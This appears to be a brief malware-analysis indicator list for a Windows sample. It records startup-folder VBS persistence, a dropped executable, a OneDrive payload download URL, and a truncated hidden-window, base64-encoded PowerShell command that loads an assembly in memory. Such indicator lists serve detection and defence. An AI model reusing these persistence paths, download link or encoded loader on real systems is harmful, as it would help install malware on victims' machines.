Technical Information
- %APPDATA%\microsoft\windows\start menu\programs\startup\pro.vbs
- https://onedrive.live.com/download?cid=dca276755bde41c0&resid=dca276755bde41c0%21131&authkey=accv1i2ck1hnzj
- %APPDATA%\microsoft\windows\start menu\programs\pro.exe
- 'on####ve.live.com':443
- 'lo###.live.com':443
- DNS ASK on####ve.live.com
- DNS ASK lo###.live.com
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -noexit -en WwBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAGIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKABOAGUAdwAtAE8AYgBqA...' (with hidden window)
- '%WINDIR%\syswow64\wscript.exe' "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\Pro.vbs"